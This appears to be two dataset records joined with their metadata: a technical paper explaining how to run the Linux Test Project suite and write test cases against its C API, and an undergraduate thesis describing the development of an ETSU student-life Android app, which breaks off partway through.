29792, 0.02057]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29792, 0.54885]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29792, 0.90282]], "google_gemma-3-12b-it_contains_pii": [[0, 892, false], [892, 6370, null], [6370, 11010, null], [11010, 18523, null], [18523, 22314, null], [22314, 29792, null]], "google_gemma-3-12b-it_is_public_document": [[0, 892, true], [892, 6370, null], [6370, 11010, null], [11010, 18523, null], [18523, 22314, null], [22314, 29792, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29792, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29792, null]], "pdf_page_numbers": [[0, 892, 1], [892, 6370, 2], [6370, 11010, 3], [11010, 18523, 4], [18523, 22314, 5], [22314, 29792, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29792, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
e287d9606939bcb7466b5323889cf2416f64a152
Testing Linux with the Linux Test Project

Paul Larson
Linux Technology Center, IBM
plars@us.ibm.com

Abstract

The Linux Test Project is an organization aimed at improving the Linux kernel by bringing test automation to the kernel testing effort. To meet this objective, the Linux Test Project develops test suites that run on multiple platforms for validating the reliability, robustness, and stability of the Linux kernel. The LTP test suite was designed to be easy to use, portable, and flexible enough that tests could be added without requiring the developer to use functions provided by the LTP test driver. This talk will cover what the Linux Test Project is and what we are doing to help improve Linux. I also plan to talk about the features provided by the test harness, the structure of the test cases, and how test cases can be written to contribute to the Linux Test Project.

1 Introduction

Through the years of Linux development, many people have asked the question, "What is being done to test Linux?" Historically, Linux testing efforts have been primarily informal and ad-hoc in nature. Users of Linux simply use it for their own normal purposes and report any problems they find. Little had been done to bring an organized testing effort to Linux, though. This matter improved somewhat in May of 2000 when Silicon Graphics Inc.™ introduced the first version of the Linux Test Project (LTP). Since that time, many individuals in the open source community and even companies such as IBM®, OSDL™, and BULL® have contributed to the LTP.

2 Using LTP

One of the design goals of the Linux Test Project was to make it easy to use. To facilitate this, the LTP includes three scripts for executing subsets of the automated tests. They are:

- runalltests.sh - runs all the automated kernel tests in sequential order
- network.sh - runs all the automated network tests in sequential order
- diskio.sh - runs the stress_floppy and stress_cdrom tests

The runalltests.sh script can be executed with little or no manual setup required by the user. Even though the script is named "runalltests" it does not really run every test in the LTP. It runs all of the completely automated tests that do not require the user to perform manual setup tasks. Destructive tests, and tests that consume so many system resources that they are designed to be run independently, such as a few of the memory tests, are not included in runalltests.

The network.sh script groups together most of the network tests. These are grouped separately because additional setup is required for these tests to function correctly. Two test machines are necessary to run all of the network tests. Both machines should have the same version of LTP compiled and installed in the same location. The client machine will be the one where the network.sh script is actually executed. On the server machine, a .rhosts entry should be created for the root user to allow connections from the client machine. The following services will need to be running for successful execution of the network test suite: rlogind, ftpd, telnetd, echo (stream), fingerd, and rshd. More detailed information about the setup for the machines running LTP may be found in the document called "How To Run the Linux Test Project (LTP) Test Suite" [RunLTP].

The diskio.sh script is a small test set that runs two I/O-intensive tests. One of these targets the cdrom drive and the other targets the floppy drive. For the cdrom test to run, a cdrom with data on it must be inserted in the cdrom drive.
For the floppy stress test to run, a blank, formatted floppy disk must be in the floppy drive.

The test driver itself is called pan. Pan can be passed a file that lists the tests to be executed; it will execute them and exit with 0 if all tests passed, or with a number indicating how many tests failed. The line from runalltests.sh that executes pan looks like this:

```
${LTPROOT}/pan/pan -e -S -a $$ -n $$ -f ${TMP}/alltests
```

The -e is necessary to tell pan to exit with the number of tests that failed. By default it will ignore exit statuses, but it is generally useful to have pan run this way. The -S option tells pan to run tests sequentially as they are read from the command-file. If this option is not specified, it will select tests at random to run. The -a $$ in the command line tells pan the name of a file to use to store the active test names, pids, and commands being executed. The $$ is used here to have it use the current pid so that a unique file is used to store this information. The -n $$ in the command line is a tag name by which this pan process will be known. It is required and should be unique, so $$ is convenient to use again. The -f option is used to tell pan the name of a command-file to execute tests from.

The command-file is a text file containing one test per line. The first item on the line is the tag name of the test, by which pan will know it. Usually this should match the TCID of the test. After the tag name and a space should be the executable with any necessary arguments. These files are usually stored under the runtest directory of LTP, but in the case of runalltests, several have been concatenated together into a file called alltests.

Another useful option for pan that is not used in runalltests is -s. The -s option tells pan the number of tests to run before exiting. If 0 is used here, pan will keep executing tests until it is manually stopped. The -t option can be used to specify the amount of time pan should run tests. This time can be specified in seconds, minutes, hours, or days. For instance, -t 12h would tell pan to stop executing tests after 12 hours. A complete list of options for pan can be found in the man page for pan in the /doc/manual directory under LTP [LTPMan].

Tests may also be executed individually, without the need for running them under pan or from a script. Once compiled, the tests are linked under the /testcases/bin directory from the top of the LTP source tree. Testcases may be executed directly from here with any valid command line options. This is very useful when a particular test is observed to cause an error. The test can be executed alone to reproduce the error rather than waiting for the entire test suite to run. Sometimes it is desirable to modify tests slightly for debugging purposes, or to add additional testing to them. To help make it easier to find tests, they have been organized under the testcases directory into four main categories:

- **Kernel** - Kernel related tests such as filesystems, io, ipc, memory management, scheduler, and system calls.
- **Network** - Network tests including tests for ipv6, multicast, nfs, rpc, setp, and network related user commands
- **Commands** - Tests for user level commands like those commonly used in application development such as ar, ld, ldd, nm, objdump, and size.
- **Misc** - Miscellaneous tests that do not fit into one of the other categories.
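As an illustration of the command-file format described above, a small hand-written command-file (say, mytestfile) might contain entries such as the following; the tags and programs are placeholders rather than actual LTP test cases, and the -i option is one of the standard test case options described in the next section:

```
mytest01 mytest01
mytest02 mytest02 -i 5
```

Such a file could then be run directly with, for example, `pan -e -S -a $$ -n $$ -f mytestfile`.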
Tests such as crash (an adaptation of the well-known crashme test), f00f, and a set of floating point math tests can be found in the misc directory. Other tests that are not part of the automated test scripts previously mentioned may also be found under this directory tree. For these tests that are not automated, the only way to run them at the time being is manually.

3 Developing Tests for LTP

The Linux Test Project was designed to be flexible enough to allow test cases to be added to it without requiring the use of any cumbersome test driver specific features. The LTP does provide a small set of functions that can be used to help with the consistency of test cases and to act as a convenience for the developer, but the driver does not require their use. Tests written to be executed under the LTP should be self-contained so that they can be executed under any environment, or separately. They should be able to detect within the test itself whether or not the test passed. If the test passes, it should return 0; anything else indicates that the test failed. The exact nature of return codes other than 0 may differ from one test to another. Most of the tests in LTP have been written in C, but they may be written in Perl, shell scripting languages, or anything else as long as appropriate return values are preserved. This flexibility allows developers to take any quick test they have written to test something, make sure it returns 0 if it passes or anything else if it doesn't, and submit it for inclusion in the LTP.

Some of the functions in LTP make use of global variables that define various aspects of the test case. Even if it is unknown whether or not these functions will be used, it is a good idea to define these variables in order to be consistent with other test cases in the LTP.

```c
char *TCID = "test01";
```

The TCID variable should be defined in a way similar to the example above. The convention that has been used in other test cases in the LTP is the system call name, or some other name representing the test, followed by a two digit number. The TCID should be different from any other LTP test case or results may be confusing when executing all the tests in the test suite. It is also a good idea to make the TCID be the same as the name of the source code file for the test. In this example, the file name should be something like test01.c.

The global variable TST_TOTAL is of type int and should be used to specify the number of individual test cases within the test program. Each test should be associated with an output line declaring the outcome of the test case.

```c
extern int Tst_count;
```

The Tst_count variable is used as a test case counter in the main test loop. The output functions provided by LTP use this variable to get the number of the test case currently being executed. This should be automatically incremented each pass through the test loop.

```c
for (lc = 0; TEST_LOOPING(lc); lc++) {
    ...
}
```

The main test loop is just a for loop, but it uses a macro called TEST_LOOPING to control the number of iterations through the loop. Standard command line options for LTP test cases allow the user to set a certain number of iterations or an amount of time to run each test. TEST_LOOPING handles making sure that the test is executed for the correct number of iterations, or for the correct amount of time. The actual test itself should be wrapped in the TEST() macro. The TEST() macro starts by resetting errno to 0 to ensure that the correct errno is detected after the test is complete.
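Putting these pieces together, a minimal test program might be structured as in the following sketch. The system call being exercised (getpid()) is chosen purely for illustration, and the sketch also uses the TEST_RETURN/TEST_ERRNO variables, parse_opts(), and the tst_resm()/tst_exit() reporting helpers that are described in the remainder of this section:

```c
/* test01.c -- illustrative skeleton of an LTP-style test case;
 * the system call under test (getpid) is only an example. */
#include <unistd.h>
#include "test.h"
#include "usctest.h"

char *TCID = "test01";   /* test case identifier, matches the file name */
int TST_TOTAL = 1;       /* number of individual test cases in this program */
extern int Tst_count;    /* test case counter used by the output functions */

int main(int argc, char *argv[])
{
	int lc;

	/* only the standard command line options are needed here */
	parse_opts(argc, argv, NULL, NULL);

	for (lc = 0; TEST_LOOPING(lc); lc++) {
		Tst_count = 0;

		/* TEST() resets errno, runs the call, and records the result
		 * in TEST_RETURN and TEST_ERRNO */
		TEST(getpid());

		if (TEST_RETURN > 0)
			tst_resm(TPASS, "getpid() returned %ld",
				 (long)TEST_RETURN);
		else
			tst_resm(TFAIL, "getpid() failed, errno=%d",
				 TEST_ERRNO);
	}

	tst_exit();
	return 0;
}
```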
After executing the system call passed to it, TEST() sets two global variables. TEST_RETURN is set to the return code and TEST_ERRNO is set to the value of errno upon return. There is also a variation of the TEST() macro called TEST_VOID() that should be used for testing system calls that return void.

Tests that require little or no manual setup are preferred. Usually setup can be performed within the test itself, or with command line options that can be passed from the execution script. If manual setup is required, the test may be left out of automated execution scripts, or grouped with other tests that have similar setup requirements, such as the network tests.

Many tests require a temporary directory to store files and directories created during the test. This is especially true of filesystem tests, and tests of system calls that operate on files and directories. The tst_tmpdir() and tst_rmdir() functions provide a convenient method of creating and cleaning up a temporary area for the test to use.

The `tst_tmpdir()` function creates a unique, temporary directory based on the first three characters of the TCID global variable. Once the directory is created, it makes it the current working directory and returns to continue execution of the test. The name of the directory created will be saved in an extern char* variable called TESTDIR in case it is needed by the test case, and for later removal by the `tst_rmdir()` function. If it is unable to create a unique name, unable to create the directory, or unable to change directory to the new location, `tst_tmpdir()` will use `tst_brk()` to output a BROK message for all test cases in the test and exit via the `tst_exit()` function. Since no cleanup function will be automatically performed in this situation, `tst_tmpdir()` should only be used at the beginning of the test, before any resources have been created that would require a cleanup function. The `tst_rmdir()` function will remove the temporary directory created by a call to `tst_tmpdir()` along with any other files or directories created under the temporary directory. The `system()` function is used by `tst_rmdir()`, so the test case should not perform unexpected signal handling on the SIGCHLD signal.

One of the biggest conveniences provided by using the LTP API is `parse_opts()`. The `parse_opts()` function provides a consistent set of useful command line options for test cases, and allows the developer to easily add more options.

```c
#include "test.h"
#include "usctest.h"

char *parse_opts(int argc, char *argv[],
                 option_t option_array[],
                 void (*user_help_func)());

typedef struct {
    char *option;
    int *flag;
    char **arg;
} option_t;
```

`option_array` must be created by the developer to contain the desired options in addition to the default ones. `user_help_func()` is a pointer to a function that will be called when the user passes `-h` to the test case. This function should display usage information for the additional options added only. If you do not wish to specify any additional command line options, `parse_opts()` should be called with NULL for `option_array` and `user_help_func()`. The default options provided by `parse_opts` are:

- `-c n` - Fork n copies of this test and run them in parallel. If `-i` or `-I` are also specified, each forked copy will run for the given number of iterations or amount of time respectively.
- `-e` - Log all errors received during the test.
- `-f` - Suppress messages about functional testing.
- `-h` - Print the help message listing these default options first, then call `user_help_func()` to display help for any extra options the developer may have added.
- `-i n` - Run the test for n consecutive iterations. Specifying a 0 for n will cause the test to loop continuously.
- `-I x` - Run the test loop until x seconds have passed.
- `-p` - Wait to receive a SIGUSR1 before beginning the test. `TEST_PAUSE` must be used in the test at the point you want it to wait for SIGUSR1.
- `-P x` - Delay x seconds after each iteration before starting the next one.

Another useful feature of the LTP API is that it provides functions to output results and test status in a consistent manner, and to exit the test with an exit code consistent with the results from that output. This paper will not cover all of these functions but will only briefly discuss the most common ones. All of these functions need to be passed a `ttype` that specifies the type of message that is being sent. The available values for `ttype` are:

- `TPASS` - Indicates that the test case had the expected result and passed.
- `TFAIL` - Indicates that the test case had an unexpected result and failed.
- `TBROK` - Indicates that the remaining test cases are broken and will not execute correctly because some precondition was not met, such as a resource not being available.
- `TCONF` - Indicates that the test case was not written to run on the current hardware or software configuration, such as machine type or kernel version.
- `TRET` - Indicates that the test case has been retired and should not be executed any longer.
- `TERROR` - Indicates that the test case experienced an unexpected or undesirable event that should not affect the test itself, such as being unable to clean up resources after the test finished.
- `TINFO` - Specifies useful information about the status of the test that does not affect the result and does not indicate a problem.

The first result output function is `tst_resm()`.

```c
void tst_resm(int ttype, char *tmesg, [arg ...])
```

This function will output `tmesg` to STDOUT. The `tmesg` string and associated args can be given to `tst_resm()` and the other functions listed here in the same fashion as strings with args can be passed to `printf()`. After outputting the message, the test case will resume.

```c
void tst_brkm(int ttype, void (*func)(), char *tmesg, [arg ...])
```

The `tst_brkm()` function prints the message specified by `tmesg`, calls the function pointed to by `func`, and exits the test, breaking any remaining test cases.

```c
void tst_exit()
```

The `tst_exit()` function exits the test with a status depending on the `ttype` values passed to previous calls to functions such as `tst_brkm()` and `tst_resm()`. For TPASS, TRET, TINFO, and TCONF the exit status is unaffected and will be 0, indicating that the test passed. TFAIL, TBROK, and TWARN all indicate that something went wrong during the test, or that the test failed, and will cause `tst_exit()` to exit the test with a non-zero status.

When a test case receives an unexpected signal, it is useful to provide a means of making it exit gracefully. The LTP provides a convenient way of doing this through the `tst_sig()` function.
When a test case receives an unexpected signal, it is useful to provide a means of making it exit gracefully. The LTP provides a convenient way of doing this through the `tst_sig()` function.

```c
#include "test.h"

void tst_sig(fork_flag, handler, cleanup)
char *fork_flag;
int (*handler)();
void (*cleanup)();
```

If the test case is creating child processes through functions such as `fork()` or `system()`, then `tst_sig()` needs to know to ignore SIGCHLD. This can be accomplished by setting `fork_flag` to FORK. If the test case is not creating child processes, `fork_flag` should be set to NOFORK. Keep in mind that if the test uses `tst_tmpdir()` and `tst_rmdir()`, the `fork_flag` should be set to FORK, because `tst_rmdir()` uses the `system()` library call.

The `handler` parameter of `tst_sig()` represents the function that will be called when an unexpected signal is intercepted. The developer may provide a custom signal handler function here that returns int, or the default signal handler may be used. To use the default signal handler, pass `DEF_HANDLER` as the `handler` parameter to `tst_sig()`. If the default handler is used, then the TCID and Tst_count variables must be defined. The default handler will use `tst_resm()` to output messages for all remaining tests that were incomplete when the signal was received.

The `cleanup` parameter is used to specify a cleanup function. After the handler has been executed, `tst_sig()` will execute the cleanup function. The cleanup function should take care of removing any resources used by the test, such as files or directories that were created to facilitate testing. If nothing is required for cleanup, `NULL` can be passed to `tst_sig()` in place of a cleanup function.

4 The Future of LTP

Most of the future plans for the Linux Test Project focus on expanding test coverage. The majority of test cases in the LTP today test system calls. This is, of course, a very important part of testing Linux, but not the only thing that should be addressed. Some tests have already been added for things such as networking, memory management, scheduling, commands, floating point math, and databases, but the breadth of test coverage should continue to expand. As the variety of tests increases, it may one day become necessary to modularize the LTP tests into separate suites that can be executed and even downloaded separately. The LTP was reorganized to make this easier if and when it becomes desirable to do so.

The completeness of current test cases should also be analyzed and improved upon if necessary. We are currently looking at code coverage analysis tools to determine how much of the target kernel code is being executed by test cases in the LTP. As we find areas of kernel code that are not adequately covered by test cases in the LTP, test cases are written or modified to expand coverage to these areas.

Additional tests are of course critical to the test suite, but for the Linux Test Project to truly be effective, people must use it. It would be nice to see the LTP test suite run as part of the exit criteria for releasing new kernels in the stable and development trees. In addition to this, it would be useful for kernel developers to execute the test suite against patches before submitting them. The LTP test suite will not find all problems, but it could reduce the number of errors in new code if used properly. If kernel developers and testers diligently submit tests for defects as they are found, the test suite could even help reduce the number of regressed defects found in Linux.
{"Source-Url": "http://ltp.sourceforge.net/documentation/technical_papers/ltp.pdf", "len_cl100k_base": 4730, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 39858, "total-output-tokens": 5137, "length": "2e12", "weborganizer": {"__label__adult": 0.00023305416107177737, "__label__art_design": 0.0001996755599975586, "__label__crime_law": 0.00021135807037353516, "__label__education_jobs": 0.0006012916564941406, "__label__entertainment": 5.334615707397461e-05, "__label__fashion_beauty": 9.262561798095704e-05, "__label__finance_business": 0.00013267993927001953, "__label__food_dining": 0.0002636909484863281, "__label__games": 0.0005216598510742188, "__label__hardware": 0.0013742446899414062, "__label__health": 0.00024628639221191406, "__label__history": 0.0001183152198791504, "__label__home_hobbies": 6.365776062011719e-05, "__label__industrial": 0.00023794174194335935, "__label__literature": 0.00012385845184326172, "__label__politics": 0.0001519918441772461, "__label__religion": 0.0002524852752685547, "__label__science_tech": 0.017303466796875, "__label__social_life": 7.230043411254883e-05, "__label__software": 0.01551055908203125, "__label__software_dev": 0.96142578125, "__label__sports_fitness": 0.0002009868621826172, "__label__transportation": 0.0003027915954589844, "__label__travel": 0.0001289844512939453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 21375, 0.00508]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 21375, 0.48733]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 21375, 0.89694]], "google_gemma-3-12b-it_contains_pii": [[0, 3145, false], [3145, 7256, null], [7256, 11433, null], [11433, 15389, null], [15389, 19630, null], [19630, 21375, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3145, true], [3145, 7256, null], [7256, 11433, null], [11433, 15389, null], [15389, 19630, null], [19630, 21375, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21375, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 21375, null]], "pdf_page_numbers": [[0, 3145, 1], [3145, 7256, 2], [7256, 11433, 3], [11433, 15389, 4], [15389, 19630, 5], [19630, 21375, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21375, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
55be094b7e63bf10ebe4992c4ca0e779a77d0249
Development of ETSU Student Life Android Application

Tyler L. Cox
ETSU

Follow this and additional works at: http://dc.etsu.edu/honors
Part of the Other Computer Sciences Commons, and the Software Engineering Commons

Recommended Citation
http://dc.etsu.edu/honors/231

This Honors Thesis - Open Access is brought to you for free and open access by Digital Commons @ East Tennessee State University. It has been accepted for inclusion in Undergraduate Honors Theses by an authorized administrator of Digital Commons @ East Tennessee State University. For more information, please contact dcadmin@etsu.edu.

DEVELOPMENT OF ETSU STUDENT LIFE ANDROID APPLICATION

Thesis submitted in partial fulfillment of Honors

By
Tyler Cox
The Honors College
University Honors Scholars
East Tennessee State University
May 10, 2014

Tyler Cox, Author
Don Bailes, Faculty Mentor
Mike Lehrfeld, Faculty Reader
Laughton Messmer, Faculty Reader

**Contents**

Introduction
Background
Learning & Initial Development
Roadblocks and Moving Forward
Analysis of Official ETSU Application
Differences and Overlap
Starting Again from Scratch
"Home" Screen
"Entertainment" Screen
"Directions" Section
"Food" Section
Reflection
Works Cited

**Introduction**

In the ever-changing field of computing technology, staying up to date with the cutting edge is the key to success. Most companies, businesses, and even academic institutions attempt to take part in this technological arms race to stay current with technology. East Tennessee State University was no exception to this rule. With around 56% of Americans currently owning a smartphone (that is, a phone with access to the internet) (Smith 2013), mobile development is clearly one of the areas where organizations are scrambling to establish a presence.

**Background**

In the fall of 2011, ETSU had no mobile presence aside from a few mobile versions of frequently used websites (such as its main homepage).
At this point, ETSU began approaching the Department of Computing (at that time, the Department of Computer Science) about possibly working with them to create a mobile application representing the school that would allow students to access pages and information quickly and easily. It was at this time that I was speaking with professors about possible thesis research. I came to Dr. Don Bailes with this question, and he mentioned to me that ETSU was looking for someone to develop an Android application for the school. Prior to this, I had no experience whatsoever with development on a mobile platform, but as this was a cutting-edge field, I was naturally attracted to the idea. Dr. Bailes spoke with me about what exactly the project entailed and what ETSU wanted from this application. I immediately jumped on board with the idea and began teaching myself the ins and outs of Android programming. I was in Dr. Bailes's Honors Intro to Computer Science II class at this point and spoke with him about allowing me to make the initial work on this project count as a final project, which he was happy to accept.

**Learning & Initial Development**

I began by searching Google for Android programming tutorials. This led me to Google's incredibly helpful and detailed guide for Android development in Eclipse (the IDE, or development environment, that I had the most experience with at the time). Armed with this information, I started development of a first program. That first program took quite a bit of time, but it helped improve my understanding of how Android worked. I was already familiar with the Java programming language (the language Android applications are written in) as a result of the Introduction to Computer Science courses that I had completed. That experience was not very helpful for Android development, as those courses focus on PC development, while most of the Java in Android development is used to generate pages and the items on those pages. Also, the pages generated with Android have an XML foundation. At this point, the only page-generating code that I knew was HTML. XML was another completely new concept that I was very intimidated by at first. I assumed it would be similar to HTML, but when I opened up the XML for my first page, the syntax was much different. Fortunately, the Android Software Development Kit in Eclipse provides a what-you-see-is-what-you-get (WYSIWYG) editor that allows the programmer to drag and drop various text fields, buttons, and other components onto a screen that will become the page. This allowed me to generate basic pages without having to know all of the nuances of Java and XML. Figure 1 shows the basic editing screen in Eclipse for an Android application.

Figure 1. Eclipse's interface for editing a particular Android page

For this first experience with Android, I went through a few of the basic tutorials that Google provided for novice developers and came up with an interactive framework that would hold my future application. At this point, the design of my mobile application was incomplete. This led to the first iteration of the application simply being a collection of screens and links. The bulk of the work for what ended up being my "Final Project" was the process of learning a completely new development platform and applying it to a basic application.

**Roadblocks and Moving Forward**

After this initial effort, the project seemed to be headed in an excellent direction.
Unfortunately, around this time the development started to falter and issues began to arise. Due to a series of intense class schedules and a steady stream of out-of-class work, development of the application slowed to a crawl and eventually had to stop. These more pressing projects, assignments, and deliverables took precedence over development and it somewhat fell to the wayside. During this downtime in development, ETSU still wanted to have their application created. I had never actually been in direct contact with any administrative unit from ETSU about my thesis becoming the “official” student application for the college, and this proved to be a major thorn in my side. During this downtime ETSU contracted an outside developer to continue the creation of the ETSU Student Application. This came as a bit of a shock to me, but in retrospect I should have anticipated it. A crucial error I made during this development process was the lack of direct communication with those at ETSU that wanted an application regarding my project. They had a need for a mobile presence and wanted it more quickly than I could deliver it. I should have contacted ETSU administration as soon as I agreed with Dr. Bailes to work on the project. Because of this lack of discussion, ETSU went and hired another developer/group of developers to create what they needed sooner. This third-party developer followed the specifications that ETSU wanted in its application and produced a quality product. **Analysis of Official ETSU Application** The official ETSU mobile application has a series of functions: It allows student access to D2L, Athletics, Social Media, News, Course Information, Maps, and ETSU-made videos. Figure 2 provides a screen capture of what the ETSU-made application looks like. Due to this app already being made, I was forced to make a decision: should I continue with my goal of creating a student life application, or scrap the idea and start with something new. This was a difficult decision, as I was initially drawn to the student life application project by a desire to create something that would be beneficial to the student population as a whole and could even be picked up as an official product of ETSU. In the end, the desire to create an application for ETSU students to assist with their daily lives led me to the decision to continue the course that I was on and develop an unofficial mobile application to complement the existing ETSU application. I focused on finding different core functionalities for my student life application and the official ETSU mobile application. While I wanted my project to be complementary, I concluded that some overlap between the two would still be acceptable. Implementing overlapping features would allow me to learn how to develop those features. **Differences and Overlap** This led to a period of brainstorming of what unique features my application would have, as well as what features would overlap with the current application. I asked many of the newer students to ETSU that I knew as well as those that had been at ETSU longer as to what kind of features they would find useful in such an application. The easiest sections to come up with were those that I felt like were important enough to overlap between the two. When I think of what the average college student would be wondering about when it came to their school, there are a few things that spring to mind. Some of these are aspects such as dining, directions, sports, and events. 
From Figure 2 above, the official ETSU application provides the user with access to sports as well as campus events. I elected to have these key elements in my application due to the fact that even if a student only downloaded my application and not ETSU’s official one, they would still be up to date with a good amount of the activities happening on campus. The actual implementation of my versions of these features will be addressed later by going into detail into just how they work and what exactly they provide the user. For differing aspects of the applications, I chose to include two key different features: directions and dining. ETSU’s official application has maps functionality, but it is not to the point that I feel like a student could effectively use it. While simply seeing a map of campus may be useful for finding one’s way around, I felt that a few user experience changes could make that even better. For starters, if students new to campus were lost trying to find their way around to a particular class, a map isn’t too terribly helpful. For example, if a student has no clue where exactly they are on campus without signs around to determine the building names. What would just having a map do? I felt like this could be remedied by implementing a series of walking/driving directions that they user could be given to direct them exactly where they need to go from any location to arrive at their destination. This would provide students with a simple, yet effective method to get to wherever they need. Also, a much forgotten choice that students have access to is ETSU ID Bucs. While most students stick to a meal plan for their food options, some (me included) have ID Bucs loaded on to their ETSU ID and use it in various locations. An unfortunate downside to this, though, is that very few people know where exactly these ID Bucs can be used at. Obviously the first thing that most people think of is on-campus food places, but unbeknownst to most of the student body, there are a plethora of off-campus restaurants and establishments that will accept ID Bucs. I felt like having a place in the application that provides this information for the user as well as simply showing what all dining options are available close to the college would be an excellent boon for the user. Starting Again from Scratch Another roadblock came in the way at this point in development, unfortunately. During my extended hiatus from working on the project, one way or another, all of my files from my first prototype of the project had become corrupted and rendered unusable. This was more of a moral setback than anything, as I had to start from scratch with development. A heavy workload the past semesters had come in between me first getting familiar with Android and this point in time, so I was hoping to have this previous code as a starting point to re-familiarize myself with. As this was not the case anymore, I essentially started learning Android all over again from scratch. The plus-side of this was that having much more web development experience from classes such as Server-Side Programming and Advanced Web Development, I was able to grasp the concepts behind what was creating the pages and the interactions between them as opposed to relying so heavily on the WYSIWYG editor. This lead to me being much more comfortable with the Android development and allowed me to start from an area that would be more stable going forward. All of this led to the “round 2” of development beginning around the start of my senior year. 
I began the development similarly to what I did when I initially started to learn Android: I followed some tutorials that Google helpfully provided until I grasped the basics. I picked up much faster this time and was able to quickly get a framework set up of what the project would be in. I wanted the application to be split into three different categories: Food, Directions, and Entertainment. “Home” Screen The application would initially boot up into a home screen that allowed the user to navigate to a particular page depending on which of these three categories they were interested in. Figure 3 shows what this home screen looks like at the current iteration of the application. Figure 3. The home screen of ETSU Student Life. Provides the user with access to Food, Directions, and Entertainment. This gives the user an easy-on-the-eyes starting position with easily recognizable paths to choose from to decide what they want to do. The user will see these three options and immediately be able to know to navigate to one of them to continue on to their desired destination. “Entertainment” Screen After creating this initial home screen, I decided that the first functionality to tackle would be the “Entertainment” section. Under this section, the user would be able to find “stuff to do” around campus. ETSU unfortunately has a poor reputation for on-campus events, but this is not true at all. There are plenty of events going on at ETSU, but the students are just rarely aware of them. This section will allow students to find out these campus events, schedules for ETSU’s various sports teams, as well as have access to ETSU’s student-run newspaper, The East Tennessean. Figure 4 shows the current version of the “Entertainment” page. ![Figure 4. This shows the “Entertainment” screen in my application.](image) From this screen, the user can navigate to the three aforementioned places. The “Campus Events” button will take the user to ETSU’s calendar of events happening on campus from the current date of access up to the next two weeks. This way any student who uses this application can easily be up-to-date on whatever is happening around campus. The “East Tennessean” button will link the user to the homepage of the East Tennessean’s website. This website is updated every time a new issue is put out, so this will allow for a student to keep up-to-date on both local and world news. Finally, the “Sports Schedule” button will take the user to another page to allow them to select from a list of sports teams and find which they wish to see the schedule of. Figure 5 shows this screen. ![Figure 5. This screen allows the user to select a Sport and then hit accept to navigate to the schedule of that team.](image) In addition to selecting and submitting, this screen (like other screens in the application) has a button that allows quick return to the home screen. Development of this section was fairly straightforward. The majority all of the content in this section is composed of simply linking the user on button presses to various external websites. I looked around on the internet for tutorials on how to fire an “Intent” (Android’s version of executing an action) to take the user to a particular webpage. After learning this, I put the code in place so that the “East Tennessean” and “Current Events” buttons would take the user to the intended place. The sports scheduling linking was a bit more of a challenge with needing to take the user to a particular place based on what they had selected from the drop-down menu. 
This was able to be done by looking at which value was currently selected in the drop-down menu when the user hit the submit button, and take them to the appropriate place based on that value. “Directions” Section Following completion of the “Entertainment” section, I elected to tackle what I thought would be one of the most challenging aspects of the project: the Directions section. I had planned on having integration with Google Maps for this part, but I had no idea how to integrate it or what the process would be to do so. Nevertheless, I dove headfirst into Google’s helpful tutorial on how to set up your own Google Maps application. This involves an in-depth process of registering your application with Google so that they can provide you with a key as well as a package of code to utilize in your application. This key is needed so that Google can track the tasks for which you are using your application’s GPS functions for. This way Google can know if someone’s application is using GPS functionality for malicious purposes. I fumbled around with this for a few days trying to understand how exactly implementing a map in my application should work. Fortunately, after browsing around online, I found many developers saying that implementation of the current version of Google Maps was not functional on the Android Emulators in Eclipse, but would actually work on a physical device. I decided to hook my own phone up and run my application on it to test this. Shockingly, it worked beautifully on my phone and it just seemed to be a problem with Google Maps and the emulators. After getting the basics down, I decided to present the user with a similar drop-down type list as the sports schedule section to select from an alphabetical list of key campus locations. This was not simply limited to buildings, but also included local hotspots, such as the Amphitheater. After selecting a location and hitting submit, the application will work with Google Maps to bring up walking directions from your current GPS-tracked location to whichever destination you chose. Figures 6 and 7 show this. ![Selection Screen](image) Figure 6. The selection screen for navigation to a particular location. Figure 7. The Google Maps navigation with walking directions 